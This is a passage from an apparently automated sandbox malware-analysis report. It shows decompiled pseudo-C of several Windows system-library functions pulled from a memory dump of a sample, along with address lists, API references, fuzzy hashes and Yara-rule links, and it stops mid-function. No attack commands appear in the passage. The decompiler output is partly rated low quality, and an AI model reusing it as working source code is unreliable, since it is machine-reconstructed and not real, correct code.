						 *(_t54 + 0x34) =  *(_t54 + 0x34) + 1;
						E341824D0(0x342667c4);
						_t26 = _t54;
						L17:
						return _t26;
					}
				}
			}

0x34173547
0x3417354a
0x3417354c
0x34173550
0x341735b2
0x341735b7
0x341735b9
0x341735c1
0x341735c7
0x341735c9
0x341735cd
0x341735d4
0x341735db
0x341735e2
0x341735e4
0x341735e9
0x341735ef
0x341735f1
0x341735f3
0x341735f8
0x341735fa
0x34173602
0x34173606
0x34173606
0x341735f8
0x3417360d
0x34173614
0x34173622
0x34173622
0x34173614
0x34173627
0x34173627
0x00000000
0x34173558
0x3417355d
0x34173562
0x34173567
0x3417356b
0x341735a6
0x341735ab
0x00000000
0x341735ab
0x34173570
0x34173576
0x00000000
0x34173592
0x34173592
0x3417359a
0x3417359f
0x34173629
0x3417362f
0x3417362f
0x34173576

APIs

RtlDebugPrintTimes.NTDLL ref: 341735C1

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3bd77640f69f319e60293eeff21d08dcb18e82548cc7b5c1fe02e6411d12bbf9
Instruction ID: 35dc39d9aeb159c8adeafc21a120cfc71d161e89dc4c6d2c2cfe37110b16833a
Opcode Fuzzy Hash: 3bd77640f69f319e60293eeff21d08dcb18e82548cc7b5c1fe02e6411d12bbf9
Instruction Fuzzy Hash: 7821D035205B48DFE7229F04C9C4B1ABFE6EF80B14F410599E8465B651CBB4E989CF92

Uniqueness

Uniqueness Score: -1.00%

Function 341FA130 Relevance: 1.5, APIs: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E341FA130(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _t24;
				intOrPtr* _t31;

				_t24 =  *( *[fs:0x30] + 0x68) & 0x02000100;
				if(_t24 != 0x2000000) {
					_t31 =  *0x34265a44; // 0x0
					if(_t31 != 0) {
						 *0x342691e0(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
						_t24 =  *_t31();
					}
					return _t24;
				}
				return E341FA1A7(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
			}

0x341fa13e
0x341fa148
0x341fa170
0x341fa178
0x341fa19a
0x341fa1a0
0x341fa1a0
0x00000000
0x341fa1a2
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 341FA19A

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1518e4c80393201c439bdccf060e00a2df3be084570dcbb79a58f478d37a3ef9
Instruction ID: 94a8d106baee4a38e127d308e4ca16f76d78df71cae46bc34f3a5d0c522e2389
Opcode Fuzzy Hash: 1518e4c80393201c439bdccf060e00a2df3be084570dcbb79a58f478d37a3ef9
Instruction Fuzzy Hash: 96018936105609AFDF028E84DC40ECA3FA6FB4C794F068201FE1866220C73AD972EF80

Uniqueness

Uniqueness Score: -1.00%

Function 341F9603 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e66f0bee0d18c2748b2c1ae7e0704cd2c157fb58f1ee0463539eae74a5fa6e
Instruction ID: ed9eea49b2f2c94d786ba1e546d43e25eaf5119b7781ad1d077961ff5bd25e5f
Opcode Fuzzy Hash: 45e66f0bee0d18c2748b2c1ae7e0704cd2c157fb58f1ee0463539eae74a5fa6e
Instruction Fuzzy Hash: 38E06572714204EBEB04DB58D845F4A77ECEB88798F1401D9F50AE7180D6A5DD41DA90

Uniqueness

Uniqueness Score: -1.00%

Function 341F60A0 Relevance: 1.5, Strings: 1, Instructions: 264
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E341F60A0(void* __ecx, void* __edx, signed int* _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v24;
				signed int _v28;
				short _v32;
				char _v36;
				signed int* _v40;
				short _v44;
				char _v48;
				intOrPtr* _v52;
				signed int _v56;
				char _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t69;
				signed int _t79;
				signed int _t80;
				signed int _t86;
				signed int* _t127;
				signed int _t128;
				signed int _t133;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				signed int _t150;
				signed int _t151;
				signed int _t155;

				_t143 = __edx;
				_v8 =  *0x3426b370 ^ _t155;
				_t127 = _a4;
				 *_t127 = 0;
				_t150 = 0;
				_v36 = 0;
				_v48 = 0;
				_v28 = 0;
				_v64 = 0;
				_v40 = _t127;
				_v32 = 0x500;
				_v44 = 0x100;
				_t69 = E34185D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x48);
				_v52 = _t69;
				if(_t69 != 0) {
					_t130 =  &_v60;
					_push( &_v60);
					_push(0x48);
					_push(_t69);
					_push(4);
					_push(0xfffffffa);
					_t151 = E341B2BC0();
					__eflags = _t151;
					if(_t151 < 0) {
						L29:
						L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v52);
						__eflags = _t151;
						if(_t151 >= 0) {
							L32:
							return L341B4B50(_t151, _t127, _v8 ^ _t155, _t143, _t150, _t151);
						}
						L30:
						if( *_t127 != 0) {
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t127);
							 *_t127 =  *_t127 & 0x00000000;
						}
						goto L32;
					}
					_v56 = _v56 & 0;
					_push( &_v60);
					_push(4);
					_push( &_v56);
					_push(0x1d);
					_push(0xfffffffa);
					_t79 = E341B2BC0();
					__eflags = _t79;
					if(_t79 < 0) {
						L11:
						_t133 = 0x34;
						__eflags = _t150;
						if(_t150 != 0) {
							_t133 = 0x44 + ( *( *_t150 + 1) & 0x000000ff) * 4;
						}
						_t80 = _v28;
						__eflags = _t80;
						if(_t80 != 0) {
							_t133 = _t133 + ( *(_t80 + 1) & 0x000000ff) * 4 + 0x10;
							__eflags = _t133;
						}
						_t152 = _t133 + (( *( *_v52 + 1) & 0x000000ff) + 0xe) * 4;
						_t86 = E34185D90(_t133,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t133 + (( *( *_v52 + 1) & 0x000000ff) + 0xe) * 4);
						 *_t127 = _t86;
						__eflags = _t86;
						if(_t86 != 0) {
							E34197C20(_t86, _t152, 2);
							E341982F0( &_v24,  &_v36, "true");
							_v16 = 0x12;
							_push(0);
							_push( &_v24);
							_push(0x10000000);
							_push(0);
							_t144 = 2;
							E3419366E( *_t127, _t144, __eflags);
							E341982F0( &_v24,  &_v36, 2);
							_push(0);
							_push( &_v24);
							_push(0x10000000);
							_push(0);
							_t145 = 2;
							_v16 = 0x20;
							_v12 = 0x220;
							E3419366E( *_t127, _t145, __eflags);
							__eflags = _t150;
							if(__eflags != 0) {
								_push(0);
								_push( *_t150);
								_push(0x10000000);
								_push(0);
								_t149 = 2;
								E3419366E( *_t127, _t149, __eflags);
							}
							_t128 = _v28;
							__eflags = _t128;
							if(__eflags == 0) {
								_t154 = _v40;
							} else {
								_push(0);
								_push(_t128);
								_push(0x10000000);
								_push(0);
								_t154 = _v40;
								_t148 = 2;
								E3419366E( *_v40, _t148, __eflags);
							}
							_push(0);
							_push( *_v52);
							_push(0x10000000);
							_push(0);
							_t146 = 2;
							E3419366E( *_t154, _t146, __eflags);
							E341982F0( &_v24,  &_v48, "true");
							_push(0);
							_push( &_v24);
							_push(0x80000000);
							_push(0);
							_v16 = 0;
							_t147 = 2;
							E3419366E( *_t154, _t147, __eflags);
							E341982F0( &_v24,  &_v36, "true");
							_push(0);
							_push( &_v24);
							_push(0x80000000);
							_push(0);
							_t143 = 2;
							_v16 = 7;
							E3419366E( *_t154, _t143, __eflags);
							_t151 = 0;
							__eflags = 0;
							goto L24;
						} else {
							_t151 = 0xc0000017;
							L17:
							_t128 = _v28;
							L24:
							__eflags = _t150;
							if(_t150 != 0) {
								L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t150);
								_t128 = _v28;
							}
							__eflags = _t128;
							if(_t128 != 0) {
								L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t128);
							}
							_t127 = _v40;
							goto L29;
						}
					}
					__eflags = _v56;
					if(_v56 == 0) {
						goto L11;
					}
					_t150 = E34185D90( &_v60,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x48);
					__eflags = _t150;
					if(_t150 != 0) {
						_push( &_v60);
						_push(0x48);
						_push(_t150);
						_push(0x1f);
						_push(0xfffffffa);
						_t151 = E341B2BC0();
						__eflags = _t151;
						if(_t151 < 0) {
							goto L17;
						}
						_t151 = E342064B0( &_v60,  *_t150,  &_v64);
						__eflags = _t151;
						if(_t151 < 0) {
							goto L17;
						}
						__eflags = _v64 - 1;
						if(__eflags != 0) {
							goto L11;
						}
						_t151 = E34206400(_t130, _t143, __eflags,  *_t150,  &_v28);
						__eflags = _t151;
						if(_t151 < 0) {
							goto L17;
						}
						goto L11;
					}
					_t151 = 0xc0000017;
					goto L29;
				}
				_t151 = 0xc0000017;
				goto L30;
			}

0x341f60a0
0x341f60af
0x341f60b3
0x341f60bc
0x341f60be
0x341f60c1
0x341f60c4
0x341f60c7
0x341f60ca
0x341f60d3
0x341f60d6
0x341f60dc
0x341f60e5
0x341f60ea
0x341f60ef
0x341f60fb
0x341f60fe
0x341f60ff
0x341f6101
0x341f6102
0x341f6104
0x341f610b
0x341f610d
0x341f610f
0x341f632c
0x341f633a
0x341f633f
0x341f6341
0x341f635d
0x341f636d
0x341f636d
0x341f6343
0x341f6346
0x341f6355
0x341f635a
0x341f635a
0x00000000
0x341f6346
0x341f6115
0x341f611b
0x341f611c
0x341f6121
0x341f6122
0x341f6124
0x341f6126
0x341f612b
0x341f612d
0x341f6194
0x341f6196
0x341f6197
0x341f6199
0x341f61a1
0x341f61a1
0x341f61a8
0x341f61ab
0x341f61ad
0x341f61b6
0x341f61b6
0x341f61b6
0x341f61c5
0x341f61d4
0x341f61d9
0x341f61db
0x341f61dd
0x341f61f0
0x341f61ff
0x341f620b
0x341f6212
0x341f6213
0x341f6214
0x341f6219
0x341f621c
0x341f621d
0x341f622c
0x341f6236
0x341f6237
0x341f6238
0x341f623d
0x341f6240
0x341f6241
0x341f6248
0x341f624f
0x341f6254
0x341f6256
0x341f625a
0x341f625b
0x341f625d
0x341f6262
0x341f6265
0x341f6266
0x341f6266
0x341f626b
0x341f626e
0x341f6270
0x341f6289
0x341f6272
0x341f6272
0x341f6273
0x341f6274
0x341f6279
0x341f627a
0x341f627f
0x341f6282
0x341f6282
0x341f6291
0x341f6293
0x341f6295
0x341f629a
0x341f629e
0x341f629f
0x341f62ae
0x341f62b8
0x341f62b9
0x341f62ba
0x341f62bf
0x341f62c2
0x341f62c7
0x341f62c8
0x341f62d7
0x341f62e1
0x341f62e3
0x341f62e4
0x341f62e9
0x341f62ed
0x341f62ee
0x341f62f5
0x341f62fa
0x341f62fa
0x00000000
0x341f61df
0x341f61df
0x341f61e4
0x341f61e4
0x341f62fc
0x341f62fc
0x341f62fe
0x341f630c
0x341f6311
0x341f6311
0x341f6314
0x341f6316
0x341f6324
0x341f6324
0x341f6329
0x00000000
0x341f6329
0x341f61dd
0x341f612f
0x341f6132
0x00000000
0x00000000
0x341f6146
0x341f6148
0x341f614a
0x341f6159
0x341f615a
0x341f615c
0x341f615d
0x341f615f
0x341f6166
0x341f6168
0x341f616a
0x00000000
0x00000000
0x341f6177
0x341f6179
0x341f617b
0x00000000
0x00000000
0x341f617d
0x341f6181
0x00000000
0x00000000
0x341f618e
0x341f6190
0x341f6192
0x00000000
0x00000000
0x00000000
0x341f6192
0x341f614c
0x00000000
0x341f614c
0x341f60f1
0x00000000

Strings

, xrefs: 341F6241

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1f57d0887aa26535a7148f67afcd3eb7c7750c257bb2d2b18c1dbbe00838f203
Instruction ID: a7625724126987ec2747ed55bcbded591a15ca10f254ab2e2d73f41b93279f19
Opcode Fuzzy Hash: 1f57d0887aa26535a7148f67afcd3eb7c7750c257bb2d2b18c1dbbe00838f203
Instruction Fuzzy Hash: 6A918271A00A19EFEB21CF94CD85FEE77B9EF48750F100159F600AB291DB75A906CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 341AA580 Relevance: 1.4, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E341AA580(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t88;
				signed short* _t89;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				signed int _t96;
				signed int _t100;
				void* _t101;
				signed int _t102;
				signed int _t104;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr _t122;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t135;
				signed int _t136;
				void* _t137;
				signed char _t139;
				signed short* _t141;
				signed int _t144;
				signed int _t145;
				void* _t147;

				_t143 = __esi;
				_t140 = __edi;
				_push(0x3c);
				_push(0x3424c9a0);
				L341C7BE4(__ebx, __edi, __esi);
				 *(_t147 - 0x48) =  *(_t147 + 0x10);
				_t110 =  *(_t147 + 8);
				 *(_t147 - 0x4c) = _t110;
				_t114 = 0;
				 *((char*)(_t147 - 0x19)) = 0;
				_t87 =  *[fs:0x30];
				if(( *(_t87 + 0x68) & 0x00000800) != 0) {
					__eflags =  *0x34266d3c - _t114; // 0x0
					if(__eflags != 0) {
						L6:
						__eflags = _t110;
						if(_t110 == 0) {
							L9:
							 *(_t147 - 0x34) = _t114;
							 *(_t147 - 4) = _t114;
							__eflags = _t110;
							if(_t110 == 0) {
								L15:
								_t144 = _t114;
								 *(_t147 - 0x28) = _t144;
								_t128 = _t114;
								 *(_t147 - 0x40) = _t128;
								_t88 = 0x21;
								_t141 =  *(_t147 + 0x14);
								__eflags =  *_t141 - _t88;
								if( *_t141 != _t88) {
									 *(_t147 - 0x24) = _t114;
									L20:
									_t89 = _t141;
									 *(_t147 - 0x30) = _t89;
									while(1) {
										_t115 =  *_t89 & 0x0000ffff;
										__eflags = _t115;
										if(_t115 != 0) {
											goto L27;
										} else {
											break;
										}
										while(1) {
											L27:
											_t89 =  &(_t89[1]);
											 *(_t147 - 0x30) = _t89;
											__eflags = _t115;
											if(_t115 == 0) {
												break;
											}
											_t115 =  *_t89 & 0x0000ffff;
										}
										_t128 = _t128 + 1;
										 *(_t147 - 0x40) = _t128;
									}
									__eflags = _t128;
									if(_t128 == 0) {
										L50:
										_t145 = _t144 << 0x12;
										__eflags = _t145;
										L51:
										 *(_t147 - 0x34) = _t145;
										 *(_t147 - 4) = 0xfffffffe;
										E341E66C4(_t110);
										_t91 = _t145;
										L2:
										 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0x10));
										return _t91;
									}
									_t119 = E34217786(_t110, _t128);
									 *(_t147 - 0x20) = _t119;
									__eflags = _t119;
									if(_t119 == 0) {
										goto L50;
									}
									_t93 = 0x17;
									 *(_t147 - 0x2c) = _t93;
									 *(_t147 - 0x44) = _t93;
									_t144 =  *(_t119 + 0xc) & 0x0000ffff;
									 *(_t147 - 0x28) = _t144;
									__eflags = _t144;
									if(_t144 != 0) {
										__eflags = _t144 - 0x800;
										if(_t144 != 0x800) {
											L34:
											_t129 =  *(_t147 + 0x10);
											__eflags = _t129;
											if(_t129 == 0) {
												L42:
												_t94 = 0;
												__eflags = 0;
												_t130 = 0;
												 *(_t147 - 0x24) = 0;
												L43:
												 *(_t147 - 0x3c) = _t130;
												 *(_t147 - 0x30) = _t141;
												while(1) {
													__eflags =  *_t141;
													_t110 =  *(_t147 + 8);
													if( *_t141 == 0) {
														goto L50;
													}
													_t120 = _t119 + 0x10;
													 *((intOrPtr*)(_t147 - 0x38)) = _t119 + 0x10;
													__eflags = _t130;
													if(_t130 != 0) {
														E34195C3F(_t120,  *(_t147 - 0x2c) +  *(_t147 - 0x2c), _t130);
														_t94 =  *(_t147 - 0x24);
														_t122 =  *((intOrPtr*)(_t147 - 0x38));
														_t120 = _t122 + _t94 * 2;
														 *((intOrPtr*)(_t147 - 0x38)) = _t122 + _t94 * 2;
													}
													__eflags =  *(_t147 - 0x2c) - _t94 +  *(_t147 - 0x2c) - _t94;
													E34195C3F(_t120,  *(_t147 - 0x2c) - _t94 +  *(_t147 - 0x2c) - _t94, _t141);
													do {
														_t96 =  *_t141 & 0x0000ffff;
														_t141 =  &(_t141[1]);
														 *(_t147 - 0x30) = _t141;
														__eflags = _t96;
													} while (_t96 != 0);
													_t119 =  *(_t147 - 0x20) + 0x40;
													 *(_t147 - 0x20) = _t119;
													_t94 =  *(_t147 - 0x24);
													_t130 =  *(_t147 - 0x3c);
												}
												goto L50;
											}
											_t54 = _t129 + 2; // 0x3
											 *(_t147 - 0x3c) = _t54;
											do {
												_t100 =  *_t129;
												_t129 = _t129 + 2;
												__eflags = _t100;
											} while (_t100 != 0);
											_t135 = _t129 -  *(_t147 - 0x3c);
											__eflags = _t135;
											_t136 = _t135 >> 1;
											 *(_t147 - 0x24) = _t136;
											 *(_t147 - 0x3c) = _t136;
											if(_t135 == 0) {
												goto L42;
											}
											__eflags = _t136 - 0x13;
											if(_t136 < 0x13) {
												_t101 = 0x17;
												_t102 = _t101 - _t136;
												__eflags = _t102;
												 *(_t147 - 0x2c) = _t102;
												 *(_t147 - 0x44) = _t102;
												_t94 =  *(_t147 - 0x24);
											} else {
												_t94 = 0;
												 *(_t147 - 0x24) = 0;
											}
											__eflags =  *(_t147 - 0x3c) - 0x13;
											asm("sbb edx, edx");
											_t130 = _t136 &  *(_t147 - 0x48);
											goto L43;
										}
										_push(L"GlobalTags");
										L32:
										_t137 = 0x2e;
										__eflags = _t119 + 0x10;
										E34195C3F(_t119 + 0x10, _t137);
										_t119 =  *(_t147 - 0x20);
										L33:
										_t119 = _t119 + 0x40;
										__eflags = _t119;
										 *(_t147 - 0x20) = _t119;
										_t144 =  *(_t119 + 0xc) & 0x0000ffff;
										 *(_t147 - 0x28) = _t144;
										goto L34;
									}
									_t104 =  *(_t147 - 0x24);
									__eflags = _t104;
									if(_t104 == 0) {
										goto L33;
									}
									_push(_t104);
									goto L32;
								}
								_t36 =  &(_t141[1]); // 0x12
								 *(_t147 - 0x24) = _t36;
								while(1) {
									_t141 =  &(_t141[1]);
									 *(_t147 + 0x14) = _t141;
									__eflags = _t88;
									if(_t88 == 0) {
										goto L20;
									}
									_t88 =  *_t141 & 0x0000ffff;
								}
								goto L20;
							}
							_t139 =  *(_t147 + 0xc) |  *(_t110 + 0x44);
							__eflags = _t139 & 0x61000000;
							asm("bt edx, 0x1c");
							__eflags = (_t87 & 0xffffff00 | (_t139 & 0x61000000) >= 0x00000000) & (_t114 & 0xffffff00 | (_t139 & 0x61000000) != 0x00000000);
							if(__eflags == 0) {
								__eflags = _t139 & 0x00000001;
								if((_t139 & 0x00000001) == 0) {
									E3417FED0( *((intOrPtr*)(_t110 + 0xc8)));
									 *((char*)(_t147 - 0x19)) = 1;
								}
								_t114 = 0;
								__eflags = 0;
								goto L15;
							}
							_push( *(_t147 + 0x14));
							_push( *(_t147 + 0x10));
							_t145 = E3421F76A(_t110, _t110, _t139, _t140, _t143, __eflags);
							goto L51;
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0xddeeddee;
						if( *((intOrPtr*)(_t110 + 8)) == 0xddeeddee) {
							goto L1;
						}
						__eflags =  *(_t110 + 0x44) & 0x01000000;
						if(( *(_t110 + 0x44) & 0x01000000) != 0) {
							goto L1;
						}
						goto L9;
					}
					_t87 = E34185D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x258);
					 *0x34266d3c = _t87;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L1;
					}
					_t114 = 0;
					__eflags = 0;
					goto L6;
				}
				L1:
				_t91 = 0;
				goto L2;
			}

0x341aa580
0x341aa580
0x341aa580
0x341aa582
0x341aa587
0x341aa58f
0x341aa592
0x341aa595
0x341aa598
0x341aa59a
0x341aa59d
0x341aa5aa
0x341e64a9
0x341e64af
0x341e64d5
0x341e64d5
0x341e64d7
0x341e64f3
0x341e64f3
0x341e64f6
0x341e64f9
0x341e64fb
0x341e6541
0x341e6541
0x341e6543
0x341e6546
0x341e6548
0x341e654d
0x341e654e
0x341e6551
0x341e6554
0x341e656c
0x341e656f
0x341e656f
0x341e6571
0x341e6574
0x341e6574
0x341e6577
0x341e657a
0x00000000
0x00000000
0x00000000
0x00000000
0x341e65b6
0x341e65b6
0x341e65b6
0x341e65b9
0x341e65bc
0x341e65bf
0x00000000
0x00000000
0x341e65c1
0x341e65c1
0x341e65c6
0x341e65c7
0x341e65c7
0x341e657c
0x341e657e
0x341e66a5
0x341e66a5
0x341e66a5
0x341e66a8
0x341e66a8
0x341e66ab
0x341e66b2
0x341e66b7
0x341aa5b2
0x341aa5b5
0x341aa5c1
0x341aa5c1
0x341e658b
0x341e658d
0x341e6590
0x341e6592
0x00000000
0x00000000
0x341e659a
0x341e659b
0x341e659e
0x341e65a1
0x341e65a5
0x341e65a8
0x341e65aa
0x341e65cc
0x341e65d2
0x341e65f4
0x341e65f4
0x341e65f7
0x341e65f9
0x341e6640
0x341e6640
0x341e6640
0x341e6642
0x341e6644
0x341e6647
0x341e6647
0x341e664a
0x341e664d
0x341e664f
0x341e6652
0x341e6655
0x00000000
0x00000000
0x341e6657
0x341e665a
0x341e665d
0x341e665f
0x341e6668
0x341e666d
0x341e6670
0x341e6673
0x341e6676
0x341e6676
0x341e667f
0x341e6681
0x341e6686
0x341e6686
0x341e6689
0x341e668c
0x341e668f
0x341e668f
0x341e6697
0x341e669a
0x341e669d
0x341e66a0
0x341e66a0
0x00000000
0x341e664d
0x341e65fb
0x341e65fe
0x341e6601
0x341e6601
0x341e6604
0x341e6609
0x341e6609
0x341e660e
0x341e660e
0x341e6611
0x341e6613
0x341e6616
0x341e6619
0x00000000
0x00000000
0x341e661b
0x341e661e
0x341e6629
0x341e662a
0x341e662a
0x341e662c
0x341e662f
0x341e6632
0x341e6620
0x341e6620
0x341e6622
0x341e6622
0x341e6635
0x341e6639
0x341e663b
0x00000000
0x341e663b
0x341e65d4
0x341e65d9
0x341e65db
0x341e65dc
0x341e65df
0x341e65e4
0x341e65e7
0x341e65e7
0x341e65e7
0x341e65ea
0x341e65ed
0x341e65f1
0x00000000
0x341e65f1
0x341e65ac
0x341e65af
0x341e65b1
0x00000000
0x00000000
0x341e65b3
0x00000000
0x341e65b3
0x341e6556
0x341e6559
0x341e655c
0x341e655c
0x341e655f
0x341e6562
0x341e6565
0x00000000
0x00000000
0x341e6567
0x341e6567
0x00000000
0x341e655c
0x341e6500
0x341e6503
0x341e650c
0x341e6513
0x341e6515
0x341e652b
0x341e652e
0x341e6536
0x341e653b
0x341e653b
0x341e653f
0x341e653f
0x00000000
0x341e653f
0x341e6517
0x341e651a
0x341e6524
0x00000000
0x341e6524
0x341e64d9
0x341e64e0
0x00000000
0x00000000
0x341e64e6
0x341e64ed
0x00000000
0x00000000
0x00000000
0x341e64ed
0x341e64c1
0x341e64c6
0x341e64cb
0x341e64cd
0x00000000
0x00000000
0x341e64d3
0x341e64d3
0x00000000
0x341e64d3
0x341aa5b0
0x341aa5b0
0x00000000

Strings

GlobalTags, xrefs: 341E65D4

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: bf3a4274ee836347f9c3ba66d92ef5fed4b262b1252074d15eafff0cd430b729
Instruction ID: 27a7c0bf85171f74d8b7232fa7869cb6b9ab16b226fff8242f6c92884d4def7c
Opcode Fuzzy Hash: bf3a4274ee836347f9c3ba66d92ef5fed4b262b1252074d15eafff0cd430b729
Instruction Fuzzy Hash: CE718FB9E10A09DFEB14CF98C5C06EDBBF2BF58390F90816EE405A7254EB318981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 3417965A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E3417965A(signed int __ecx, intOrPtr* __edx, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char* _v76;
				signed int _v80;
				char _v84;
				signed int _t78;
				intOrPtr _t100;
				signed int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				intOrPtr* _t111;
				intOrPtr* _t112;
				void* _t116;
				intOrPtr _t117;
				intOrPtr* _t118;
				signed int _t119;

				_t118 = __edx;
				_t116 = 0;
				_v28 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v24 = 0;
				if(__ecx == 0 || __edx == 0 || _a12 == 0) {
					return 0xc000000d;
				} else {
					if(L3417B920(__ecx, __ecx & 0xfffffffc) == 0) {
						_t119 = 0xc000007b;
						L27:
						if(_v8 != 0) {
							_push(_v8);
							E341B2A80();
							_v8 = _t116;
						}
						if(_v16 != 0) {
							_push(_v16);
							_push(0xffffffff);
							E341B2C50();
						}
						L25:
						return _t119;
					}
					_t107 = 6;
					asm("sbb ebx, ebx");
					_t108 = 2;
					_t105 = (_t103 & _t107) + _t108;
					if(_a4 != 0) {
						_v36 =  *__edx;
						_t51 = _t118 + 4; // 0x8c1284d
						_v32 =  *_t51;
						_v20 = 0;
						_v84 = 0x18;
						L33:
						_v80 = _v80 & 0x00000000;
						L10:
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						_t109 =  &_v8;
						_v72 = 0x40;
						_v76 =  &_v36;
						_t78 = E3417929A( &_v8,  &_v84, _v28);
						_t119 = _t78;
						if(_t116 == 0) {
							_t116 = 0;
							L14:
							if(_t119 < 0) {
								goto L27;
							}
							_push(_v8);
							_push(0x8000000);
							_push(_t105);
							_push(_t116);
							_push(_t116);
							_push(0xf0005);
							_push( &_v12);
							_t119 = E341B2E50();
							if(_t119 < 0) {
								goto L27;
							}
							_push(_t105);
							_push(_t116);
							_push("true");
							_v44 = _t116;
							_push( &_v24);
							_v40 = _t116;
							_push( &_v44);
							_push(_t116);
							_push(_t116);
							_push( &_v16);
							_push(0xffffffff);
							_push(_v12);
							_t119 = E341B2C30();
							if(_v12 != 0) {
								_push(_v12);
								E341B2A80();
								_v12 = _t116;
							}
							if(_t119 < 0) {
								goto L27;
							} else {
								if(L3417B920(_t109, _v16) == 0) {
									_t119 = 0xc000007b;
								}
								if(_t119 < 0) {
									goto L27;
								} else {
									 *_a12 = _v16;
									_t111 = _a16;
									if(_t111 != 0) {
										 *_t111 = _v24;
									}
									_t112 = _a8;
									if(_t112 == 0) {
										if(_v8 != 0) {
											_push(_v8);
											E341B2A80();
										}
									} else {
										 *_t112 = _v8;
									}
									goto L25;
								}
							}
						}
						_t117 = _v48;
						if(_t117 != 0) {
							asm("lock xadd [edi], eax");
							if((_t78 | 0xffffffff) != 0) {
								goto L12;
							}
							_push( *((intOrPtr*)(_t117 + 4)));
							E341B2A80();
							_t116 = 0;
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t117);
							L13:
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t116, _v20);
							goto L14;
						}
